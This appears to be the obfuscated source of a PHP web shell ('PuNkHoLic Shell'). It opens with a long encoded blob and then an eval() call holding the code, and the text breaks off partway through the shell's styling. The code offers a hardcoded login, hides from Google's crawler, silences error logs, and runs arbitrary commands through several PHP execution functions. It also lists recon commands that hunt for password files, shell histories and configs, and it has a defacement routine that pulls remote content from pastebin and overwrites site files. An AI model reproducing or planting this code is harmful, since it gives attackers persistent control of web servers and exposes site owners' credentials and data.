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";
eval("?><?php\r\n\$deface_url='http://pastebin.com/raw/xCjJQYHH';\r\n\$UserName=\"priv\";\r\n\$auth_pass=\"shell\";\r\n\$color=\"#ABEFFA\";\r\n\$Theme='#09B5A7';\r\n\$TabsColor='#0E5062';\r\n\$default_action='FilesMan';\r\n@define('SELF_PATH',__FILE__);\r\nif(strpos(\$_SERVER['HTTP_USER_AGENT'],'Google')!==false){\r\nheader('HTTP/1.0 404 Not Found');\r\nexit;\r\n}\r\n@session_start();\r\n@error_reporting(0);\r\n@ini_set('error_log',NULL);\r\n@ini_set('display_errors',0);\r\n@ini_set('log_errors',0);\r\n@ini_set('max_execution_time',0);\r\n@set_time_limit(0);\r\n@set_magic_quotes_runtime(0);\r\nif(get_magic_quotes_gpc()){\r\nfunction stripslashes_array(\$array){\r\nreturn is_array(\$array)?array_map('stripslashes_array',\$array):stripslashes(\$array);\r\n}\r\n\$_POST=stripslashes_array(\$_POST);\r\n}\r\nfunction printLogin(){\r\nif(\$_POST['pass']!=\$auth_pass&&\$_POST['uname']!=\$UserName){\r\n\$status='Wrong Password or UserName :(';\r\n}\r\n?>\r\n<html>\r\n<head>\r\n<title>PuNkHoLic shell</title>\r\n<link href=\"https://fonts.googleapis.com/css?family=Josefin+Sans:400,100\" rel=\"stylesheet\">\r\n</head>\r\n<style>\r\nbody{\r\nfont-family:Josefin Sans,sans-serif;\r\nbackground:black;\r\ncolor:#ABEFFF;\r\n}\r\n}\r\n.loginpage{\r\nheight:400px;\r\nwidth:500px;\r\nborder:1px solid;\r\nborder-color:#ABEFFF;\r\ntext-align:center;\r\nborder-radius:5px;\r\nmargin-top:100px;\r\n}\r\n#pageheading{\r\nfont-size:25px;\r\ncolor:#ABEFFF;\r\nmargin-top:10px;\r\n}\r\n.loginpage img{\r\nwidth:500px;\r\n}\r\ninput{\r\nbackground:black;\r\nborder-color:#ABEFFF;\r\nborder-radius:10px;\r\nmargin-top:10px;\r\npadding:5px;\r\ncolor:#ABEFFF;\r\n}\r\ninput:hover{\r\nbackground:#ABEFFF;\r\ncolor:red;\r\n}\r\n</style>\r\n<body>\r\n<center>\r\n<div class=\"loginpage\">\r\n<img src=\"http://i.imgur.com/il1o2RI.jpg\"alt=\"PuNkHoLic\">\r\n<div id=\"pageheading\">PuNkHoLic Shell</div>\r\n<form method=\"post\">\r\nUser Name:<input type=\"text\"name=\"uname\"><br>\r\nPassword:<input type=\"password\"name=\"pass\"><br>\r\n<input type=\"submit\" name=\"login\" value=\"Login\">\r\n<?php\r\nif (isset(\$status)) {\r\n?>\r\n</form>\r\n</d<p><?=\$status?></p> \r\n</center>\r\n</body>\r\n</html>\r\n<?php\r\n}\r\nexit;\r\n}\r\nif(!isset( \$_SESSION[md5(\$_SERVER['HTTP_HOST'])]))\r\nif(empty( \$auth_pass )||\r\n(isset(\$_POST['pass']) &&(\$_POST['pass']) == \$auth_pass&& (\$_POST['uname']) == \$UserName))\r\n\$_SESSION[md5(\$_SERVER['HTTP_HOST'])] = true;\r\nelse\r\nprintLogin();\r\nif(strtolower(substr(PHP_OS,0,3))==\"win\")\r\n\$os='win';\r\nelse\r\n\$os='nix';\r\n\$safe_mode=@ini_get('safe_mode');\r\n\$disable_functions = @ini_get('disable_functions');\r\n\$home_cwd=@getcwd();\r\nif( isset(\$_POST['c']))\r\n@chdir(\$_POST['c']);\r\n\$cwd = @getcwd();\r\nif( \$os == 'win') {\r\n\$home_cwd=str_replace(\"\\\\\", \"/\", \$home_cwd);\r\n\$cwd=str_replace(\"\\\\\", \"/\", \$cwd);\r\n}\r\nif(\$cwd[strlen(\$cwd)-1]!= '/' )\r\n\$cwd .= '/';\r\nif(\$os=='win'){\r\n\$aliases = array(\r\n\"List Directory\" => \"dir\",\r\n\"Find index.php in current dir\" => \"dir /s /w /b index.php\",\r\n\"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\",\r\n\"Show active connections\" => \"netstat -an\",\r\n\"Show running services\" => \"net start\",\r\n\"User accounts\" => \"net user\",\r\n\"Show computers\" => \"net view\",\r\n\"ARP Table\" => \"arp -a\",\r\n\"IP Configuration\" => \"ipconfig /all\"\r\n);\r\n}\r\nelse{\r\n\$aliases = array(\r\n\"List dir\" => \"ls -la\",\r\n\"list file attributes on a Linux second extended file system\" => \"lsattr -va\",\r\n\"show opened ports\" => \"netstat -an | grep -i listen\",\r\n\"Find\" => \"\",\r\n\"find all suid files\" => \"find / -type f -perm -04000 -ls\",\r\n\"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\",\r\n\"find all sgid files\" => \"find / -type f -perm -02000 -ls\",\r\n\"find sgid files in current dir\" => \"find . -type f -perm -02000 -ls\",\r\n\"find config.inc.php files\" => \"find / -type f -name config.inc.php\",\r\n\"find config* files\" => \"find / -type f -name \\\"config*\\\"\",\r\n\"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\",\r\n\"find all writable folders and files\" => \"find / -perm -2 -ls\",\r\n\"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\",\r\n\"find all service.pwd files\" => \"find / -type f -name service.pwd\",\r\n\"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\",\r\n\"find all .htpasswd files\" => \"find / -type f -name .htpasswd\",\r\n\"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\",\r\n\"find all .bash_history files\" => \"find / -type f -name .bash_history\",\r\n\"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\",\r\n\"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\",\r\n\"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\",\r\n\"Locate\" => \"\",\r\n\"locate httpd.conf files\" => \"locate httpd.conf\",\r\n\"locate vhosts.conf files\" => \"locate vhosts.conf\",\r\n\"locate proftpd.conf files\" => \"locate proftpd.conf\",\r\n\"locate psybnc.conf files\" => \"locate psybnc.conf\",\r\n\"locate my.conf files\" => \"locate my.conf\",\r\n\"locate admin.php files\" =>\"locate admin.php\",\r\n\"locate cfg.php files\" => \"locate cfg.php\",\r\n\"locate conf.php files\" => \"locate conf.php\",\r\n\"locate config.dat files\" => \"locate config.dat\",\r\n\"locate config.php files\" => \"locate config.php\",\r\n\"locate config.inc files\" => \"locate config.inc\",\r\n\"locate config.inc.php\" => \"locate config.inc.php\",\r\n\"locate config.default.php files\" => \"locate config.default.php\",\r\n\"locate config* files \" => \"locate config\",\r\n\"locate .conf files\"=>\"locate '.conf'\",\r\n\"locate .pwd files\" => \"locate '.pwd'\",\r\n\"locate .sql files\" => \"locate '.sql'\",\r\n\"locate .htpasswd files\" => \"locate '.htpasswd'\",\r\n\"locate .bash_history files\" => \"locate '.bash_history'\",\r\n\"locate .mysql_history files\" => \"locate '.mysql_history'\",\r\n\"locate .fetchmailrc files\" => \"locate '.fetchmailrc'\",\r\n\"locate backup files\" => \"locate backup\",\r\n\"locate dump files\" => \"locate dump\",\r\n\"locate priv files\" => \"locate priv\"\r\n);\r\n}\r\nif(isset(\$_POST['p1']) && \$_POST['p1']=='deface') {\r\n\$def = file_get_contents(\$deface_url);\r\nfile_put_contents(\$_POST['c'].\$_POST['p2'],\$def);\r\n}\r\nfunction ex(\$in) {\r\n\$out = '';\r\nif ( function_exists(' exec ')) {\r\n@exec(\$in,\$out);\r\n\$out = @join(\"\\n\",\$out);\r\n}elseif(function_exists('passthru')) {\r\nob_start();\r\n@passthru(\$in);\r\n\$out = ob_get_clean();\r\n}elseif(function_exists('system')) {\r\nob_start();\r\n@system(\$in);\r\n\$out = ob_get_clean();\r\n}elseif(function_exists('shell_exec')) {\r\n\$out = shell_exec(\$in);\r\n}elseif(is_resource(\$f = @popen(\$in,\"r\"))) {\r\n\$out = \"\";\r\nwhile(!@feof(\$f))\r\n\$out .= fread(\$f,1024);\r\npclose(\$f);\r\n}\r\nreturn \$out;\r\n}\r\nfunction which(\$p) {\r\n\$path = ex('which '.\$p);\r\nif(!empty(\$path))\r\nreturn \$path;\r\nreturn false;\r\n}\r\nfunction printHeader() {\r\nif(empty(\$_POST['charset']))\r\n\$_POST['charset'] = \"UTF-8\";\r\nglobal \$color;\r\nglobal \$Theme;\r\nglobal \$TabsColor;\r\necho \"<html><head><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'></head>\";\r\necho '<html>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset='.\$_POST['charset'].'\"><title>PuNkHoLic  Shell</title>\r\n<style>\r\nbody {background-color:black;color:#fff;}\r\nbody,td,th{ font-family: Josefin Sans, sans-serif;font-size:13px;margin:0;vertical-align:top; }\r\nspan,h1,a{ color:'.\$color.' !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }\r\ndiv.content{ padding: 0px;margin:0 0px;background: #0F1010;border:1px solid '.\$Theme.'; border-radius:5px;}\r\na{ text-decoration:none; }\r\na:hover{ border-bottom:0px solid #5e5e5e;text-decoration:none; }\r\na:hover{cursor: url(\"http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani\"), url(\"http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif\"), auto;text-decoration:none;}\r\n.ml1{ border:1px solid '.\$Theme.';padding:px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:'.\$Theme.'; background:#2F2F2F;}\r\ninput, textarea, select{ margin-top:0;color:#63E1FF;background-color:black;border-radius:5px;border:1px solid '.\$Theme.'; border-radis:5px;font: 10pt arial,\"Courier New\"; }\r\ninput[type=\"button\"]:hover,input[type=\"submit\"]:hover {background-color:#094F60;color:black;text-decoration:none;} \r\nform{ margin:0px; background:#0F1010;}\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 80%; background:black; border-radius:5px; border-color:'.\$Theme.'; }\r\n.main th{text-align:left;background-color:'.\$TabsColor.';}\r\n.main tr:hover{background:'.\$Theme.'; border:5px solid;border-color:'.\$Theme.';}\r\n.main td, th{vertical-align:middle;}\r\n.menu { height:30px; border-radius:10px;}\r\n.menu th{padding:1px;border-radius: 5px;background:'.\$TabsColor.'; -webkit-transform: rotate(20deg);\r\n-moz-transform: rotate(20deg);\r\n-o-transform: rotate(20deg);\r\n-ms-transform: rotate(20deg);\r\ntransform: rotate(20deg);}\r\n.menu th:hover{background:#0F1010;text-decoration: none;}\r\npre {font-family: Josefin Sans, sans-serif;color:#FFFFFF;}\r\n#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 